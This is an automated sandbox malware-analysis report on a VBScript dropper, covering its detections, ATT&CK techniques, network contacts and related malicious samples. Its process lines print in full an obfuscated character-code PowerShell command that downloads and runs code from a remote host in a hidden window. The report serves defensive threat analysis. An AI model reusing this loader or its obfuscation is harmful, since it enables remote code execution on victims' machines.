Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4838
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4996
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472 | Thread sleep count: 4838 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2472 | Thread sleep count: 4996 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM
Source: wscript.exe, 00000000.00000003.2155460887.0000021328DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DD7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328DD7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW'J
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe | Network Connect: 149.56.240.127 443
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^^^|%{[char]($_+381)})-join'') ^^^| ^^^&($BqIeP) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $($BqIeP = $('{7}{8}{1}' -f $('BxljcZKie'.ToCharArray())); $((-290,-303,-280,-265,-335,-298,-280,-267,-263,-276,-282,-280,-301,-270,-276,-271,-265,-304,-284,-271,-284,-278,-280,-267,-288,-323,-323,-298,-280,-267,-263,-280,-267,-314,-280,-267,-265,-276,-279,-276,-282,-284,-265,-280,-295,-284,-273,-276,-281,-284,-265,-276,-270,-271,-314,-284,-273,-273,-283,-284,-282,-274,-349,-320,-349,-258,-345,-265,-267,-264,-280,-256,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-349,-320,-349,-290,-298,-260,-266,-265,-280,-272,-335,-303,-280,-265,-335,-309,-265,-265,-269,-294,-280,-283,-299,-280,-268,-264,-280,-266,-265,-288,-323,-323,-314,-267,-280,-284,-265,-280,-341,-342,-277,-265,-265,-269,-266,-323,-334,-334,-277,-270,-266,-265,-325,-328,-328,-333,-333,-335,-276,-271,-279,-270,-323,-332,-328,-330,-331,-331,-334,-262,-280,-283,-332,-335,-269,-277,-269,-342,-340,-322,-349,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-297,-276,-272,-280,-270,-264,-265,-349,-320,-349,-330,-333,-333,-333,-333,-333,-322,-349,-345,-341,-290,-298,-260,-266,-265,-280,-272,-335,-308,-270,-335,-298,-265,-267,-280,-284,-272,-299,-280,-284,-281,-280,-267,-288,-341,-345,-300,-315,-299,-307,-265,-278,-300,-298,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-341,-340,-335,-310,-280,-265,-299,-280,-266,-269,-270,-271,-266,-280,-298,-265,-267,-280,-284,-272,-341,-340,-340,-340,-335,-299,-280,-284,-281,-297,-270,-312,-271,-281,-341,-340,-349,-257,-349,-308,-312,-293)^|%{[char]($_+381)})-join'') ^| ^&($BqIeP) "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
MITRE ATT&CK Matrix, listed per tactic column (a number in parentheses is the signature-count badge the report shows next to that technique; techniques without a number had no matching signature):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Scripting (221); Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (11); Exploitation for Client Execution (1); PowerShell (1); Cron; Launchd; Scheduled Task
Persistence: Scripting (221); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (111); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (111); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1607480, Sample: analysis.vbs, Startdate: 05/02/2025, Architecture: WINDOWS, Score: 84)

Process chain: wscript.exe (14) started cmd.exe (1); cmd.exe started powershell.exe (15 17), conhost.exe and a second cmd.exe (1).
Network: wscript.exe connected to s4.histats.com 149.56.240.127, port 443, local port 49704 (OVHFR, Canada); powershell.exe connected to host85500.info 45.93.9.167, port 15322, local port 49705 (VMAGE-ASRU, Russian Federation).
Signatures on the start node: Sigma detected: WScript or CScript Dropper; Joe Sandbox ML detected suspicious sample; Sigma detected: Script Initiated Connection to Non-Local Network.
Signatures on wscript.exe: System process connects to network (likely due to code injection or exploit); VBScript performs obfuscated calls to suspicious functions; Wscript starts Powershell (via cmd or directly); 3 other signatures.
Signatures on cmd.exe: Wscript starts Powershell (via cmd or directly); Obfuscated command line found.

Source | Detection | Scanner | Label
analysis.vbs | 7% | Virustotal |
analysis.vbs | 3% | ReversingLabs | Win32.Dropper.Generic
No Antivirus matches
Source | Detection | Scanner | Label
https://s4.histav2 | 0% | Avira URL Cloud | safe
https://s4.hista | 0% | Avira URL Cloud | safe
https://s4.histatl2 | 0% | Avira URL Cloud | safe
http://www.microsoft.cot | 0% | Avira URL Cloud | safe


Name | IP | Active | Malicious | Antivirus Detection | Reputation
host85500.info | 45.93.9.167 | true | false | | unknown
s4.histats.com | 149.56.240.127 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://s4.histats.com/stats/0.php?4926118&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://s4.histats.com/st | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histav2 | wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://histats.com/d_openedjg | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/o | wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_openedw2 | wscript.exe, 00000000.00000003.2155460887.0000021328D82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328D87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155993130.0000021328D87000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/s | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.microsoft.cot | wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://histats.com/d_openedl | wscript.exe, 00000000.00000003.2156569055.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155775019.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156362022.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2156423007.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157099379.0000021326CAF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_opened- | wscript.exe, 00000000.00000002.2157235442.0000021326F35000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_openedP | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histatl2 | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://s4.histats.com/stats/0.php?4926118& | wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.histats.com/C | wscript.exe, 00000000.00000003.2155993130.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2155460887.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2157396890.0000021328DB9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_opened | wscript.exe, 00000000.00000003.2155969410.0000021326C3F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://histats.com/d_openedh | wscript.exe, 00000000.00000002.2157512064.0000021328E53000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://s4.hista | wscript.exe, 00000000.00000002.2157030674.0000021326C46000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
45.93.9.167 | host85500.info | Russian Federation | 44676 | VMAGE-ASRU | false
149.56.240.127 | s4.histats.com | Canada | 16276 | OVHFR | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1607480
Start date and time: 2025-02-05 16:19:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: analysis.vbs
Detection: MAL
Classification: mal84.expl.evad.winVBS@8/5@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.12.23.50
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
10:20:18 | API Interceptor | 45x Sleep call for process: powershell.exe modified
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                45.93.9.167CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                  149.56.240.127https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                    https://alluc.co/watch-movies/passengers.htmlGet hashmaliciousUnknownBrowse
                                      https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_AGet hashmaliciousUnknownBrowse
                                        http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                          http://moremashup.comGet hashmaliciousUnknownBrowse
                                            https://circleoftoast.blogspot.comGet hashmaliciousUnknownBrowse
                                              http://instaofficiallog.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                https://www.google.com/url?rct=j&sa=t&url=https://mencsom.click/call/aixheijmur&ct=ga&cd=CAEYASoTNTAxNTU4MzAyNDMwMDkzOTY4MTIaNzRmM2RkZTE1NWFkOWUzMzpjb206ZW46VVM&usg=AOvVaw0__SVRP8owZu02bhN2WI1SGet hashmaliciousUnknownBrowse
                                                  https://netflixfreefiresportlive.blogspot.com/Get hashmaliciousHTMLPhisherBrowse
                                                    http://s953497062.onlinehome.us/fixit?_recovrAccountGet hashmaliciousUnknownBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      s4.histats.comCfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                      • 142.4.219.198
                                                      https://getwellslogsnowonline.vercel.app/Get hashmaliciousUnknownBrowse
                                                      • 149.56.240.132
                                                      https://fooofooofooo.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.127
                                                      El3cE5jq1L.pdfGet hashmaliciousUnknownBrowse
                                                      • 149.56.240.129
                                                      http://home45insurance.blogspot.comGet hashmaliciousUnknownBrowse
                                                      • 54.39.128.162
                                                      http://jinoodle-polopol.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.27
                                                      https://eightdays-pdfnow.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.130
                                                      http://nomads-primes-pdfs.b-cdn.net/Get hashmaliciousTechSupportScamBrowse
                                                      • 149.56.240.27
                                                      https://suman006723213.github.io/garena.reward.ff/Get hashmaliciousHTMLPhisherBrowse
                                                      • 149.56.240.27
                                                      https://199.188.109.181Get hashmaliciousUnknownBrowse
                                                      • 158.69.254.144
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      OVHFRvessels details.exeGet hashmaliciousCryptOne, MassLogger RATBrowse
                                                      • 51.81.194.202
                                                      https://www.mccallionstaffing.com/search-jobs/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                      • 54.38.113.6
                                                      CfF7MWq7aG.htmlGet hashmaliciousUnknownBrowse
                                                      • 142.4.219.198
                                                       https://westallisheating.com/ | malicious | CAPTCHA Scam ClickFix | 51.81.55.251
                                                       Bank Slip pdf.exe | malicious | FormBook, PureLog Stealer | 54.39.129.84
                                                       https://eventmidasbuyz.merchats.com/ | malicious | HTMLPhisher | 46.105.222.82
                                                       res.arm5.elf | malicious | Unknown | 149.60.1.98
                                                       res.spc.elf | malicious | Unknown | 188.165.189.140
                                                       https://je.engl6.shop/webro-DPD-notificare/ | malicious | Unknown | 54.38.113.8
                                                       https://tt.vg/notificareDPD02 | malicious | Unknown | 51.178.195.217
                                                       VMAGE-ASRU05epqpFYdF.exe | malicious | PureLog Stealer, SmokeLoader | 2.59.163.71
                                                       _30343667.js | malicious | PureLog Stealer, SmokeLoader | 2.59.163.71
                                                       CfF7MWq7aG.html | malicious | Unknown | 45.93.9.167
                                                       svc2.exe | malicious | SmokeLoader | 2.59.163.71
                                                       file.hta | malicious | SmokeLoader | 2.59.163.172
                                                       #U0414#U043e#U0433#U043e#U0432i#U0440_#U043f#U043e#U0441#U0442#U0430#U0432#U043a#U0438.js | malicious | SmokeLoader | 2.59.163.172
                                                       powerpc.nn.elf | malicious | Mirai, Okiru | 45.130.170.23
                                                       JzDYvnUh8s.exe | malicious | RedLine | 5.182.36.101
                                                       Salary Amendment.xlsx | malicious | HTMLPhisher | 2.59.163.43
                                                       file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, Vidar | 193.43.91.119
                                                       Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
                                                       37f463bf4616ecd445d4a1937da06e19 | vessels details.exe | malicious | CryptOne, MassLogger RAT | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | https://gruposiblings.com/facturacion.php | malicious | Unknown | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | New Order_pdf_006534325.exe | malicious | GuLoader | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | FC4311009.exe | malicious | GuLoader, Snake Keylogger | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | New Order List Inquiry #657833.exe | malicious | Discord Token Stealer, GuLoader | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | PROFORMA INVOICE - AL AHWAL AL JAYEDAH TECH.CONT.L.L.C.exe | malicious | GuLoader | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | FAKTURA 012025.exe | malicious | GuLoader | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | URGENT Quotation.exe | malicious | FormBook, GuLoader | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | Factura.exe | malicious | Snake Keylogger | 149.56.240.127
                                                       37f463bf4616ecd445d4a1937da06e19 | FAKTURA 012025.exe | malicious | GuLoader | 149.56.240.127
                                                      No context
                                                      Process:C:\Windows\System32\wscript.exe
                                                      File Type:ASCII text
                                                      Category:dropped
                                                      Size (bytes):376
                                                      Entropy (8bit):5.175134110355963
                                                      Encrypted:false
                                                      SSDEEP:6:51DMwYb13LkVVXI8mgO9lVhnmUqZzwGdDVTYqL1+LD+mMkuc1zlCBbAm+RbDRWP/:51DrYb13QvuHnmVZkGdDJH10D+xc15C5
                                                      MD5:C2B26B17141E97DA490556030D44F1C3
                                                      SHA1:FE0D875538ED94E607D4F3FEFECFC8F797FF3EA9
                                                      SHA-256:892D55861A7789EEC2CAD963B875D9EBF537FF3698F08D0349CE86395D224262
                                                      SHA-512:67DB732D53C80D1BF30EF6EE75A73ED69ED071AC4E84FF86789A16DFAE810BEF0D2CEF472D6E8624247196334B7F48A65158552FC8A012F968ECDD332A840235
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:_HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);.b.async="async";b.type="text/javascript";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(b,a);}catch(e){}}();
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):5829
                                                      Entropy (8bit):4.901113710259376
                                                      Encrypted:false
                                                      SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                      MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                      SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                      SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                      SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
